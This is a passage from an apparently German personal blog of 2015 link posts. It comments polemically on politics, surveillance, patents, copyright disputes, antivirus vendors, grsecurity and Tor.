Aber ich denke mal, ein guter Vergleichswert ist, wie wir mit Straftätern umgehen. Bei Gefängnisstrafen ist das ja auch so, dass es nicht um die Bestrafung geht, sondern um Resozialisation. Wir haben ja auch keine Todesstrafe mehr, egal wie schlimm jemand straffällig wird. Wäre es bei Straftätern OK, wenn man deren Arbeitgeber mit dem Ziel anschreibt, dass die gefeuert werden? Dieser Typ hat einen Ladenbesitzer umgebracht, weil er Schnaps stehlen wollte. So jemanden sollten Sie nicht bei sich arbeiten haben! Wäre das akzeptabel? Eher nicht, oder?
So und jetzt kommt dazu, dass im Falle des Raubmörders ein faires Verfahren stattgefunden hat, in dem ein Richter entschieden hat, ob der schuldig ist oder nicht. Hier haben wir es zwar im Allgemeinen auch mit einer relativ klaren Beweislage zu tun, aber das Strafmaß wird nicht von einem Richter verhängt, sondern von einem wütenden Mob eingefordert.
Ich finde diese ganze Entwicklung jedenfalls zutiefst beunruhigend. In besagtem Blog finden sich übrigens auch schon die ersten unschuldigen Kollateralschäden, wo die Recherche den falschen Arbeitgeber gefunden hat, oder wo derjenige sich ungerecht verfolgt fühlt, er sei gar kein Rechter und die hätten seinen Kommentar missverstanden.
Ich bin mir jedenfalls ziemlich sicher, dass der Resozialisierungsgedanke zum Scheitern verurteilt ist, wenn man die Leute aus ihren Jobs rauszwängt. Dann haben die doch erst Recht das Gefühl, dass die Ausländer uns die Arbeitsplätze wegnehmen, wenn sie keinen neuen finden. Das verstärkt den Hass-Zyklus doch nur noch weiter.
Bei all der Negativität finde ich es aber auch gut, dass das gesellschaftlich immerhin hinreichend geächtet ist, ein Nazi zu sein, dass die dann auch tatsächlich gefeuert werden. Das könnte ja auch anders sein. In so einem Land würde man ja auch nicht wohnen wollen.
Seufz.

Wed Sep 9 2015

[l] Lesetipp (Vorsicht, langer Text): Eine soziologische Einordnung der Frage nach der Herkunft der "microaggressions". Das ist nicht die Einordnung sondern nur ein Artikel über das Paper, das die Einordnung macht, aber schon dieser Artikel ist lang und komplex.
Die Kernthese ist, wie ich finde, sehr spannend. Ich zitiere mal (ist gleich im ersten Absatz):
We’re beginning a second transition of moral cultures. The first major transition happened in the 18th and 19th centuries when most Western societies moved away from cultures of honor (where people must earn honor and must therefore avenge insults on their own) to cultures of dignity in which people are assumed to have dignity and don’t need to earn it.
Ehre muss man sich erarbeiten, und wenn man sie nicht verteidigt, dann ist sie weg. Würde hat man, und man muss sie auch nicht mit Gewalt verteidigen. Es gibt keine Duelle mehr. Wenn jemand kriminell handelt, dann geht man zur Polizei und nicht zum Waffenschrank. Und jetzt kommt der zweite Übergang, sagt dieses Paper:
Campbell and Manning describe how this culture of dignity is now giving way to a new culture of victimhood in which people are encouraged to respond to even the slightest unintentional offense, as in an honor culture. But they must not obtain redress on their own; they must appeal for help to powerful others or administrative bodies, to whom they must make the case that they have been victimized. It is the very presence of such administrative bodies, within a culture that is highly egalitarian and diverse (i.e., many college campuses) that gives rise to intense efforts to identify oneself as a fragile and aggrieved victim.
Jetzt haben wir, sagen die, einen Übergang von der Kultur der Menschenwürde zur Kultur des Opfertums. Jetzt definiert man sich nicht mehr über seine Menschenwürde und kann auch mal über eine kleine Unfreundlichkeit den Mantel des Vergessens ausbreiten, sondern jetzt definiert man sich darüber, wie übel man verfolgt und benachteiligt wird, wie stark man von anderen zum Opfer gemacht wird. Man wehrt sich nicht mehr selbst, sagen sie, sondern man muss sich an mächtige Verbündete richten.
Das wiederum deckt sich nur partiell mit meinen Erfahrungen. Ich sehe durchaus auch Gewalt, oder sagen wir mal: Aktionismus zu Lasten anderer, der mit der eigenen Opferrolle legitmiert wird. Aber das ist nicht der zentrale Punkt hier. Ich zitiere:
The key idea is that the new moral culture of victimhood fosters “moral dependence” and an atrophying of the ability to handle small interpersonal matters on one’s own. At the same time that it weakens individuals, it creates a society of constant and intense moral conflict as people compete for status as victims or as defenders of victims.
Daraus leiten sie dann ab, dass die Taktik im Konfliktfall ist, Dritten gegenüber eine besonders überzeugende Anklage gegen den angeblichen Täter vorbringen zu können, was dann dazu führt, dass man schon mal ein bisschen übertreibt oder einzelne Punkte gar ganz erfindet.
Ich finde ja die Frage spannend, ob wir es hier mit einer Verunselbständigung zu tun haben. Das etablierte Narrativ, zumindest Jungen gegenüber, ist ja immer: Du musst dich wehren können, es wird Situationen geben, bei denen du dich nur auf dich selbst verlassen kannst. Und das würde ja jetzt auf den Kopf gestellt, zu: Du alleine kannst gar nichts machen, du brauchst immer Hilfe von anderen. Ist das gut oder schlecht? Hat das Auswirkungen auf andere Dinge? Ich denke jetzt an sowas wie so Robinson Crusoe-Situationen. Wenn man so erzogen ist, dass man sich selber helfen können muss, dann sucht man Nahrung, baut eine Hütte und pflanzt vielleicht was an. Wenn man so erzogen ist, dass man alleine eh nichts reißen kann, verhungert man dann? Oder kann man das nicht übertragen?
Ich bin mir noch nicht sicher, ob ich diesem Framing folgen kann, aber es baut zumindest einen Rahmen auf, innerhalb dessen man mal darüber reden kann, was wir hier eigentlich gerade beobachten.
Und in der Tat stellen sich interessante Fragen, wie zum Beispiel ob wir jetzt komplett zu einer Aufmerksamkeitsökonomie werden. Ob sich der Selbstwert darüber definiert, wieviel Aufmerksamkeit man erheischen kann, und die erheischt man ja dann über die überzeugende Darstellung, wie verfolgt und benachteiligt man ist, so in seiner Opferrolle.
Eine Sache will ich noch zitieren:
Indeed, the core of much modern activism, from protest rallies to leaflet campaigns to publicizing offenses on websites, appears to be concerned with rallying enough public support to convince authorities to act.
Mit anderen Worten: Wenn die Authorities dann nicht reagieren, verpufft das alles ganz schnell wieder. Das kann man ja bei den ganzen hohlen Empörungswellen auf Twitter auch gut beobachten. Da gibt es so Empörungstouristen, die von einer Gerechten Sache zur nächsten dackeln, aber keine davon hat irgendeinen bleibenden Wert. Damit meine ich: Niemand hat etwas investiert, niemand ist ein Risiko eingegangen.
Auch die Beobachtung, dass die Opfer von Mikroaggressionen selber alle hochprivilegiert sind, wird angesprochen:
Rather, such forms as microaggression complaints and protest demonstrations appear to flourish among the relatively educated and affluent populations of American colleges and universities. The socially down and out are so inferior to third parties that they are unlikely to campaign for their support, just as they are unlikely to receive it.
Die gehen sogar noch einen Schritt weiter und sagen: Die echten Opfer würden sich nie an diese aktuellen Strukturen professioneller "Opfer" wenden, weil sie nicht davon ausgehen könnten, von denen Unterstützung zu erfahren.
Der Text ist nicht ganz so lang, wie es auf den ersten Blick aussieht, weil die unteren 50% oder so Kommentare sind.
[l] Kennt ihr den schon? Mann macht reihenweise die Spendenkonten von rechten Gruppierungen zu, indem er die Banken anschreibt und ihnen sagt, dass das Konten von rechten Gruppierungen sind. Mehr Druckmittel hat er nicht und braucht es offensichtlich auch nicht.
So sehr ich mich freue, wenn jemand der Politik den Geldhahn zudreht, und insbesondere den fiesen Rechten, so sehr frage ich mich, wo das hinführen soll? Werden dann als nächstes die Konten von Antisemiten zugemacht? Oder wie wäre es mit Kinderschändern? Oder mit Vergewaltigern! Je abartiger der Vorwurf, desto weniger Nachweis scheint nötig, und desto weniger, so fürchte ich, werden Banken auf Beweisen bestehen, bevor sie Konten zumachen. Was ist mit Homophobie? Reicht das dann auch? Transphobie? Was ist mit Leuten, die mit jemandem zusammengearbeitet haben, gegen den entsprechende Vorwürfe bestehen?
Ich fühle mich bei sowas an die Zustände in den USA erinnert, wo es in diversen Bundesländern und Kommunen Regelungen gibt, dass Sexualstraftäter sich nicht näher als 300 Meter oder sowas an Schulen und Wohnstätten von Kindern annähern dürfen. Sexualstraftäter ist man übrigens auch, wenn man nachts besoffen beim an den Baum pinkeln erwischt wird. Und die Leute müssen dann irgendwo abseits der Gesellschaft auf Campingplätzen hausen und sich ihre Lebensmittel liefern lassen, weil sie sonst gegen die Regeln verstoßen würden, denn das Netz an Spielplätzen, Schulen und Kindergärten und so weiter ist dichter als man denken würde.
Aus meiner Sicht hat solche Ausgrenzung noch nie bei irgendwas geholfen, im Gegenteil ist das der Grund, wieso die Nazis so in ihre Parallelwelten abgedriftet sind, und wieso man argumentativ an die nicht mehr rankommt. Wenn man Leute lange genug abkanzelt und wegdrückt, dann kriegt man nicht nur keine Resozialisierung mehr hin, man verliert auch jeden Überblick darüber, wie viele es davon gibt, wie radikal die sind, und man kennt auch die potentiellen Nachwuchs nicht und kann ihn gezielt gegen menschenverachtendes Gedankengut immunisieren. Eines der stärksten Druckmittel für gutes Benehmen ist "wenn du dazugehören willst, dann musst du dich soundso verhalten". Das gibt man auch aus der Hand, wenn man den Leuten sagt, dass sie nicht dazugehören dürfen, weil sie Nazis sind.
Ich halte das alles für sehr gefährlich und finde, dass sich der Umgang der Deutschen mit den Nazis mal normalisieren muss. Mit Leugnen des Problems kommen wir nicht weiter, und ausgrenzen führt zuverlässig zu den ganzen "großen Überraschungen" in Hoyerswerda, Heidenau und co. Ich befürchte auch, dass man durch Verbote die Sache nur attraktiver macht. Mein Problem ist nicht mit dem Logo sondern mit dem, der das Logo überzeugt herumträgt.
Wahrscheinlich ist meine Vorstellung naiv, dass man Hardcore-Nazis umstimmen kann. Aber so wie wir es jetzt machen funktioniert es ja offensichtlich auch nicht.
Update: Devisenstellen waren das Instrument der Nazis, um den Juden ihr Geld abzunehmen. Konten durften sie aber immer noch haben. Nur nicht mehr beliebig abheben.
[l] Im Streit zwischen den Verlagen und Google hatten die Verleger ja von Google nicht nur Schutzgeld verlangt, sondern wollten Google dann via Kartellamt dazu zwingen, ihre schutzgeldpflichtigen Leistungen in Anspruch zu nehmen. Das Kartellamt hat sich dazu jetzt geäußert:
Daraufhin kündigte Google an, Suchergebnisse für die Webseiten der von VG Media im Rahmen des Rechtsstreits vertretenen Verlage nur noch verkürzt anzuzeigen, wenn die Verlage nicht die Einwilligung in die unentgeltliche Nutzung erklärten. Google rechtfertigte diese Vorgehensweise mit dem Risiko, aus einer etwaigen Verletzung des Leistungsschutzrechts in Anspruch genommen zu werden.
Das Bundeskartellamt sieht in diesem Vorbringen eine sachliche Rechtfertigung für das Verhalten von Google gegenüber den Verlegern. Auch ein marktbeherrschendes Unternehmen kann kartellrechtlich nicht dazu verpflichtet werden, bei einer ungeklärten Rechtslage ein erhebliches Schadensersatzrisiko einzugehen. Das Bundeskartellamt hat deshalb kein förmliches Verfahren gegen Google wegen einer möglichen Diskriminierung der VG Media eingeleitet.
Krawumm, Totalschaden. Tja, also ich weiß ja nicht, wie ihr das seht, aber für mich klingt das nach einer weiteren Beförderung für den Keese bei Springer! Der hat seine Arbeit ja auch prima gemacht. Er hat die anderen Verlage in falsche Hoffnung eingelullt, dass das sich online schon regelt, während Springer ordentlich Alternativkonzepte ausgelotet hat. Springer hat seine Vormachtstellung ausgebaut, und die ganzen Verlage stehen vor dem Ruin.
Oder sehe ich das falsch und es war alles ganz anders? (Danke, Florian)

Tue Sep 8 2015

[l] Mir fiel heute auf, dass Syrien gerade Afghanistan 2.0 ist.
Wieder zetteln die Amis einen Krieg an und finanzieren religiöse Extremisten für ihren Krieg gegen die Russen, wieder verteidigen die Russen die unbeliebte Regierung, und wieder wissen die Amis, dass Abziehen für die Russen keine Option ist.
Der Unterschied ist, dass die Amis dieses Mal die Krise auf neumodische Art und Weise herbeigeführt haben. Syrien ist nämlich eines der krassesten Opfer der Klimaveränderung, an der die USA überproportional die Schuld tragen (in Sachen Schadstoffausstoß pro Bevölkerung). Zynisch betrachtet könnte man das so formulieren, dass dies der erste dokumentierte Fall von Wetterkontrolle als Kriegswaffe war.
Syrien hat nämlich Jahre der extremen Dürre hinter sich. Die Ernte ist fast komplett ausgefallen, die Bevölkerung hungerte. Wasser ist zudem auch zu wenig da, und das zeichnet sich auch schon echt lange als Problem ab. Also zogen die Hungernden in die Städte, die das nicht auffangen konnten, und Assads solide Machtposition erodierte. Diese Gelegenheit nutzten die Rebellen und ISIS für ihre Bürgerkriegsambitionen.
In Alternativlos 34 hat Rop erklärt, dass die Russen Syrien nicht nur wegen des Marinestützpunktes im Mittelmeer nicht aufgeben können, sondern auch weil Katar gerne eine Erdgaspipeline nach Europa legen würde, und die würde das russische Erdgasmonopol in Europa brechen. Diese Pipeline müsste entweder durch den Irak oder durch Syrien. Im Irak ist Bürgerkrieg, und Assad hat mit den Russen einen Deal gemacht, dass die Pipeline in Syrien nicht stattfindet. Die Russen können da jetzt also Assad nicht abtreten lassen. Ihre eigene wirtschaftliche Existenz steht auf dem Spiel. Die Amis wissen das und kippen wie damals in Afghanistan immer schön Öl ins Feuer. Scheiß auf die langfristigen Folgen für die Region, ist ja nicht unser Heimatland, was da den Bach runter geht. Sehr tragisch.

Mon Sep 7 2015

[l] Privatsphäre ist out, Big Data ist in. Auch Apps fahren voll auf der Schiene, und die User klicken halt immer alle Warnungen weg beim Store. Die Leute werden nicht mal abgeschreckt, wenn eine vorgebliche Porno-App Kamera-Zugriff verlangt. Na und was hat die Porno-App dann mit dem Kamera-Zugriff gemacht? Die User fotografiert und mit den Fotos erpresst.
Neue Geschäftsmodelle für 300! :-)
[l] Wisst ihr, was mal richtig geil ist? Wenn man abends nach einem langen Arbeitstag aus der Bahn steigt, nach Hause fährt, die Linkliste für Alternativlos 34 machen will, und dann hat die schon jemand gemacht und mir zugemailt!
Ich habe die mal weitgehend direkt übernommen. Vielen Dank an den Einsender! Der hat es so geschafft, ein paar Links unterzubringen, bei denen ich andere genommen hätte. :-)

Sun Sep 6 2015

[l] Liebe Alternativlos-Hörer, wir haben eure Schmerzensschreie gehört, und es war nicht nett von uns, euch so auf kalten Entzug zu setzen. Zu unserer Verteidigung sei vorgebracht, dass sowohl Frank als auch ich dieses Jahr geschäftlich außerordentlich viel um die Ohren hatten. Und jetzt fällt auch noch unser Aufnahmestudio weg. Das haben wir als Zeichen genommen, dass wir jetzt schnell eine Sendung machen müssen, bevor unsere Infrastruktur gänzlich der Apokalypse anheimfällt. Unser Freund Rop war zufällig gerade in Berlin, also haben wir die Sendung mit ihm gemacht (auch wenn er gefühlt nicht so viel zu Wort kommt wie sonst unsere Gäste).
Am Ende hatten wir so viel zu sagen, dass wir gar nicht mehr geschafft haben, noch ein "was würden wir eigentlich tun, wenn wir jetzt die kommissarische Regierungsweiterführung aufgedrückt bekämen"-Segment zu machen. Naja, nächste Sendung.
Ich muss heute früh ins Bett und morgen früh raus, daher habe ich das jetzt ein bisschen übereilt rausgehauen. Ich hoffe, das klappt trotzdem alles. Viel Spaß beim Hören!

Fri Sep 4 2015

[l] Liebe Leser, ihr müsst jetzt sehr stark sein. Der BND hat gelogen. Nein, wirklich! Ich weiß!!
Nach SPIEGEL-Informationen wurden in der Operation "Glotaic" zwischen 2004 und 2006 Telefon- und Faxverkehre des US-Anbieters MCI an dessen deutschem Standort Hilden überwacht. Dabei wurden die Audiodaten abgehörter Gespräche "direkt nach USA geroutet", damit "die Audiofunktion ohne Aussetzer funktioniert", wie es in einem vertraulichen Papier des BND heißt.
Bislang hatten BND-Mitarbeiter im NSA-Untersuchungsausschuss des Bundestags angegeben, alle Gespräche seien vom BND gefiltert und geprüft worden.
Ich sage euch, wenn uns das vorher jemand gesagt hätte, dass uns unsere eigenen Geheimdienste so dreist belügen würden, dann hätten wir die schon vor Jahren zugemacht!1!!
Oh, warte …

Wed Sep 2 2015

[l] getdigital hat eine Abmahnung von Getty Images für den Socially Awkward Penguin erhalten, ein bekanntes Mem.
Die haben da anscheinend einen Ärger-Magneten im Keller bei getdigital, das ist ja nicht das erste Mal, dass die von irgendwelchen Leuten wegen angeblicher Urheberrechtsprobleme abgemahnt werden. Meine Güte, ey.
Der Clou an der Sache ist aber, dass Getty denen ein Angebot gemacht hat, das ohne Anwaltsgebühren zu regeln, gegen "nur" 785,40 Euro. Allerdings gilt das Angebot nur dann, wenn sie Stillschweigen bewahren. Vermutlich um Getty nicht die ewigen Jagdgründe mit einer Warnung zu verschmutzen. An dieser Stelle daher mal wieder einen herzlichen Dank an getdigital, die für solche Schweinereien nicht zu haben sind und das lieber öffentlich machen und dafür Anwaltsärger in Kauf nehmen.

Fri Aug 28 2015

[l] Der Bug des Tages ist eine Spinne, die es sich in einer Luftqualitätsmessstation in Calgary bequem gemacht hat, und damit die gemessene Luftqualität von 4 auf "10+ very high risk" gesenkt hat.

Thu Aug 27 2015

[l] grsecurity pullt ein "beleidigtes Kleinkind" und will Stable Patches nur noch an Sponsoren veröffentlichen. Begründung: Es gäbe da eine Firma in der Embedded Industry, die ihre Arbeit nimmt, mit ihrem Markenzeichen wirbt, und dann einen alten, kaputten Patch ausliefert und keinen müden Dollar an grsecurity gezahlt hat für die Integration.
Als Kontext: grsecurity macht seit echt vielen Jahren exzeptionell gute Arbeit. Deren Eigenlob da oben ist nicht übertrieben. Die haben u.a. ASLR erfunden. OpenBSD (und natürlich auch alle anderen) hat dieses zentrale Security-Feature von denen kopiert. Und das ist nur deren bekannteste Erfindung, die machen da wirklich hervorragende Arbeit.
Die fiese Firma, die sie da nicht explizit nennen wollen, ist vermutlich Wind River / Intel.
So sehr ich ihre Erwartungshaltung verstehen kann — wer möchte nicht für seine Arbeit bezahlt werden? —, so wenig zielführend ist diese Aktion meiner Meinung nach. Erstens hatten die ja, wie grsecurity hier länglich ausführt, eh nicht den aktuellen Stable-Patch genommen, sondern irgendeinen alten, gammeligen Stinkepatch beim Portieren noch kaputtgemacht. Das Ziel treffen sie damit also gar nicht, nur die ganzen anderen User.
Zweitens finde ich es bescheuert, von Sponsoren zu reden, und dann nur denen den Content zu geben. Wenn ich Geld gebe und dafür was kriege, dann ist das kein Sponsoren-Verhältnis sondern da wird etwas bezahlt. Sponsoren zahlen dafür, dass ihr Logo irgendwo steht. Und wenn sie ihre Patches nicht öffnen, dann sollten sie vielleicht auch ihren Laden von "Open Source Security" umbenennen. Denn das ist dann nicht mehr, was sie tun.
Ich glaube, dass die bessere Lösung gewesen wäre, irgendwo eine Pranger-Webseite zu pflegen. Oder einfach "not for resale" in die Lizenz zu schreiben, wenn sie das nicht möchten.
Wobei das natürlich schon echt unverständlich ist, wieso ein Milliardenkonzern wie Intel nicht ein paar Almosen aus der Portokasse in Richtung grsecurity krümeln kann. Das merken die doch gar nicht in ihrem Quartalsbericht! Das fällt unter die Rundungsgrenze! Und damit meine ich übrigens: Intel sollte die fördern, egal ob Wind River jetzt die implizierte Firma ist oder nicht. Oder halt über die Linux Foundation fördern. Meine Güte, irgendein Modell wird sich da doch finden lassen!
Update: Zwei Hinweise von einem Einsender: Bei den Pwnie-Awards 2011 gab es einen Lifetime Achievement Award für einen von PaX/grsecurity. Und Nicht nur Wind River, auch Verifone kommt in Frage.

Tue Aug 25 2015

[l] Der BGH hat Apples "Swipe to unlock"-Patent weggeschossen. Erstens haben sie ein Windows-CE-Gerät von 2004 gefunden, das sowas auch schon gemacht hat, und zweitens war dem gegenüber die Schöpfungshöhe zu gering.
Ich bin damit ehrlich gesagt immer noch unzufrieden. Ich finde, das CE-Gerät hätte man nicht erwähnen müssen. Diese ganzen Bullshit-Patente gehören entsorgt, weil sie Bullshit sind, nicht weil es Prior Art gibt. Man stelle sich mal vor, Microsoft oder diese Schweden von dem CE-Gerät hätten das damals patentiert und würden jetzt Apple damit erpressen. Oder den Rest der Branche. Oder man stelle sich vor, wir müssten alle Patentgebühren an die Erfinder von Tastatur, Maus und Resetknopf abdrücken. Auf ein Display mit abgerundeten Kanten darf es keine Schutzrechte geben, und auf diesen ganzen anderen Trivialkram auch nicht. Die Ansage der Vorinstanz klingt da schon besser für meine Ohren:
Dem Antrag Motorolas gab das Bundespatentgericht im April 2013 statt und erklärte das Patent für nichtig, weil das beschriebene Verfahren dem Stand der Technik entspreche, darüber hinaus kein technisches Problem löse und deshalb nicht patentierbar sei (Az. 2 Ni 59/11).
Fuck yeah, so muss das laufen! Und der Typ beim Patentamt, der diesen Mist begutachtet und durchgewunken hat, der sollte rückwirkend ein paar Monatsgehälter verwirkt haben.

Thu Aug 20 2015

[l] Banksy hat in England einen Kunst-Ferienpark namens "Dismaland" gemacht, ist bis Ende September offen.

Sun Aug 16 2015

[l] Im Moment geht die Story rum, dass Kaspersky die anderen Schlangenöler sabotiert haben soll. Golem dazu. Ich verstehe nicht, wieso das jetzt Nachrichtenwert hat. Erst mal: Die haben sich nicht bei Symantec ins Updatesystem reingehackt und Norton kaputte Signaturen untergejubelt. Die kaputten Signaturen haben die anderen freiwillig und ohne Not eingebaut. Was Kaspersky wohl getan haben soll, ist Nicht-Malware basteln zu lassen und bei Virustotel hochzuladen und dann als Malware zu flaggen, und dann mal gucken, welche Konkurrenten das auch einfach übernommen haben. Das finde ich legitim. Virustotal ist eine Plattform der Antivirenhersteller. Wenn Anbieter schlampen, ist das vollständig ihre Verantwortung. Sich von Kaspersky trollen lassen und dann auch noch mit dem Finger auf Kaspersky zeigen ist nicht nur unsportlich sondern wäre mir auch ausgesprochen peinlich gewesen an deren Stelle. Damit räumen die ja nicht nur ein, dass sie sich haben verarschen lassen, sondern auch dass ihre "Prüfung" von Malware zur Signaturerstellung eine Lachnummer ist.
Und so wird dann ein Schuh aus der Sache, denn das kommt jetzt nicht von den anderen Herstellern, die Story, sondern von "Ex-Kaspersky-Mitarbeitern", d.h. von Kaspersky selbst. Für mich sieht das aus wie eine als Pseudo-Kontroverse getarnte PR-Nummer von Kaspersky, um sich selbst als einzigen Marktteilnehmer darzustellen, der noch ordentlich prüft. Glaubt kein Wort von sowas. Schlangenöl ist Schlangenöl.
Im Übrigen basiert die ganze Branche auf geheimen Insider-Malware-Börsen, und die Hersteller tauschen alle ihre Malware-Samples aus. Ich bin da kein Insider, insofern weiß ich nicht, wie weit die Automatisierung der Signaturgenerierung ist. Was ich vor ein paar Jahren mal gesehen habe, ist dass das "manuell" gemacht wurde, allerdings mit massivem Tool-Aufgebot. Viel tatsächlich manuelle Arbeit war da nicht beteiligt, aber völlig automatisiert war es auch noch nicht. Wenn man die Tools der Konkurrenz beobachtet, kann man diesen Vorgang möglicherweise aus der Ferne reversen und so trojanische Signaturen unterjubeln.
Aber mal ehrlich, der ganze Ansatz mit den Signaturen ist für den Arsch. Dieses Geplänkel hin oder her, wer sich Software verkaufen lässt, die Viren fernhalten soll, hat es auch nicht besser verdient.
Update: Laut dieses Vortrages von 2013 von Microsoft scheint genau das passiert zu sein.

Thu Aug 13 2015

[l] A-Ha! Aktivisten von "Black Lives Matter" haben jetzt auch eine Veranstaltung von Jeb Bush kaputtgemacht. Na also. Geht doch. Allerdings:
Bush met privately with members of the Black Lives Matter movement prior to the scheduled town hall, according to his campaign, although they would not confirm if the activists who interrupted Bush were the same activists he had met with.
Andererseits muss man das dann wohl wieder unter "die Freunde angreifen" verbuchen.

Wed Aug 12 2015

[l] Github scheint sich — zumindest bei Atom — auf einen anderen Code of Conduct festzulegen: diesen hier, Contributor Code of Conduct. Und der sieht mir auf den ersten Blick auch in Ordnung aus. Wobei ich mich ja immer noch frage, wozu wir überhaupt einen Code of Conduct brauchen. Nichts von den hier explizit gemachten Dingen ist in irgendeiner Art von zivilisierter Gesellschaft etwas anderes als völlig klar übergriffig und wird entsprechend geahndet. Wer sich wie ein Arschloch benimmt, fliegt raus. Ich sehe da nicht mal Anflüge einer Grauzone, die ein Explizitmachen irgendwie rechtfertigen würden. Es fällt allerdings auf, dass sie die Nationalität explizit nehmen, und damit gegen geltendee Gesetze verstoßen, denn die USA diskriminiert unilateral gegen Länder wie Syrien und den Iran und verbietet Technologietransfer in diese Länder. Eine Site wie Github kann die also, mal ganz pragmatisch betrachtet, gar nicht nicht diskriminieren. Und damit stellt sich dann die Frage, wieso wir ein solches Dokument überhaupt brauchen.

Sat Aug 8 2015

[l] In der Sowjetunion waren ja die ganzen Produktionszweige nicht gleich verteilt. Die Ukraine zum Beispiel hat wichtige Teile der Militärproduktion gemacht. Und jetzt, wo die Ukraine-Krise zu Spannungen geführt hat, gehen den Russen die Ersatzteile aus.

Tue Aug 4 2015

[l] Das ist ja auch mal eine spannende Theorie: Range hat die Netzpolitik-Ermittlungen gemacht, damit sie ihn endlich gehen lassen und er diesen unwürdigen NSA- und NSU-Bullshit nicht mehr weisungsgebunden mittragen muss. Strategische Inkompetenz nennt man das, wenn man eine ungeliebte, zwangsweise zugewiesene Aufgabe dann nach Strich und Faden verkackt, damit sie nicht nochmal auf die Idee kommen, einem so einen Scheiß zuzuweisen.

Wed Jul 29 2015

[l] Lustige Story über ein Softwareupdate von Chrysler. Und zwar haben die da anscheinend EXE und ZIP-Dateien an ihre Kunden gemailt und ihnen gesagt, sie sollen das mal auf einen USB-Stick tun und den in das Auto stecken zum Software-Update. (Danke, Andreas)

Tue Jul 28 2015

[l] Wisst ihr, was sie auf Guantanamo gemacht haben, bevor das ein Folterknast war? Da haben sie dort Flugzeugtreibstoff verklappt. Und jetzt fällt ihnen völlig überraschend auf, dass es dort eine Krebs-Häufung unter ansonsten jungen, gesunden Angestellten gibt. Bei den Insassen guckt natürlich niemand, wo kämen wir da hin, wenn wir denen plötzlich Menschenrechte zugestehen müssten.

Mon Jul 27 2015

[l] Weil jetzt hier vereinzelt Leute nach HORNET fragen, dem angeblichen "Tor-Nachfolger": Ich würde da erst mal die Finger von lassen. Deren Heilsversprechen ist, wenn ich das auf die Schnelle richtig verstehe, dass sie die Sicherheit von Tor partiell schwächen und in ein MPLS/Mixmaster-ähnliches System überführen und dann ist es GANZ VIEL SCHNELLER und dann würden das einfach alle immer anschalten und wir hätten viel mehr Sicherheit, weil die NSA unmöglich so viel Traffic analysieren kann.
Also erstmal: Ich glaube nicht, dass die NSA ein Problem damit hat, beliebig viel Geld auszugeben, wenn es aus ihrer Sicht nötig ist.
Zweitens: Die Leute nehmen noch nicht mal durchgehend PGP und SSL. Die Idee, dass die jetzt alle Onion Routing machen, weil das plötzlich performt, ist lächerlich.
Drittens: Tor SOLL langsam sein. Je mehr Jitter da drin ist, desto schwieriger ist die Korrelation anhand gesniffter Pakete. Eigentlich ist es schon völlig falsch, über Tor überhaupt Echtzeitdienste zu fahren. Man sollte da lieber mehrere Sekunden Verzögerung einbauen, künstlich, noch oben drauf.
Die Prämisse, dass Tor zu langsam ist, stimmt also schonmal nicht.
Aber ich habe mir das Paper noch nicht durchgelesen, nur Berichterstattung darüber, und könnte daher auch völlig falsch liegen.
Update: Die Schwächung gegenüber Tor ist bei näherer Betrachtung sehr gering, praktisch nicht der Rede wert. Auf der anderen Seite haben sie sich Gedanken gemacht, wie man Trafficanalyse erschweren und die Pfadlänge verbergen kann, und die Lösung ist: Padding aller Pakete auf Maximalgröße. Am Ende des Tages schluckt das viel mehr Bandbreite als Tor. Wie man unter solchem Umständen von High Performance reden kann, erschließt sich mir nicht wirklich. Im LAN vielleicht. Auf der anderen Seite wird mir gerade glaubwürdig versichert, dass bei Tor-Nodes tatsächlich das Lookup des States die CPU auf Anschlag hält. Hmm.

Tue Jul 21 2015

[l] Benutzt hier jemand Docker-Container, die auf Ubuntu oder Fedora basieren?
Das ist dann wohl eine Copyright-Verletzung.
Nein, wirklich! Die Linux Distros könnten da rumzicken. Hat wohl bisher noch keine gemacht, aber nunja. Wer dachte, hey, freie Software ist freie Software, und gerade die GPL sollte doch dafür sorgen, dass von der Front kein Stress kommt, … Die Free Software Foundation hat da zwei Jahre rumverhandelt. Unglaublich.

Mon Jul 20 2015

[l] Gute Nachrichten: Glyphosat ist doch nicht krebserregend!
Zu dem Ergebnis kam jetzt das Bundesinstitut für Risikobewertung. Die haben eine Metastudie gemacht, d.h. die haben Studien zu dem Thema gesucht und geschaut, in welche Richtung es mehr Studien gibt. Einziges Problem:
Diese Liste mit 92 Titeln untersuchte nun die „Süddeutsche Zeitung“ und fand heraus: 14 davon waren gar keine wissenschaftlichen Expertisen, sondern Leserbriefe an das Fachmagazin. Davon wiederum kamen zehn direkt von Mitarbeitern des Agrar- und Gentechnikkonzerns Monsanto, oder aus dessen Umfeld.
Man darf den Einfluss von Leserbriefen nicht unterschätzen!
Update:
Vielleicht hat die SZ da was falsch verstanden. Bei "Nature" gibt es als Textform die "Letters", das sind dem peer review unterliegende Einreichungen, die 4 Seiten nicht übersteigen: http://www.fr-online.de/wirtschaft/pflanzenschutzmittel-streit-um-glyphosat-geht-weiter,1472780,31257600.html
Das ist nicht ein Leserbrief wie die Kommentarspalte der SZ.
(Danke, Heiko)

Sun Jul 19 2015

[l] Neulich diagnostiziert Habermas noch, Deutschland habt mit seinem Bully-Gehabe den mühsam aufgebauten Kredit seit dem Krieg wieder zertrampelt, heute kann man es live und in Farbe sehen.
Der Deutschenhass ist längst über Griechenlands Grenzen geschwappt und hat alles überspült. Das "Vierte Reich" soll drohen. Machen wir uns nichts vor: hässliche Deutsche - das sind wir alle.
Danke, Herr Schäuble! Das haben sie ja ganz hervorragend gemacht! Ich erinnere mich noch mit Grausen an Schäuble als Innenminister. Furchtbar. Und so ist das jetzt europaweit. Und weil er in unserem Namen gehandelt hat, sind wir jetzt alle die Arschlöcher.
Finde ich gut. Endlich hat das mal Konsequenzen. Die Deutschen sind ja zu lethargisch, die Merkel und ihre Schergen mit Mistgabeln davonzujagen. Wie das so ist mit Eiterbeulen: Dann blubbert das eben so lange und wird größer, bis es jemanden ärgert, der sich noch empören kann.
Hoffentlich können die Wähler in diesem Land jetzt mal langsam tun, was nötig ist, bevor die Aliierten uns wieder in Schutt und Asche bomben müssen.

Fri Jul 17 2015

[l] Erinnert ihr euch an dieses Video, wo eine junge, gutaussehende Frau 10 Stunden lang durch New York geht und dann fies und gemein von lauter Männern angesprochen wird?
Letzten Herbst war das so ein virales Video. Ich hatte darüber auch was damals.
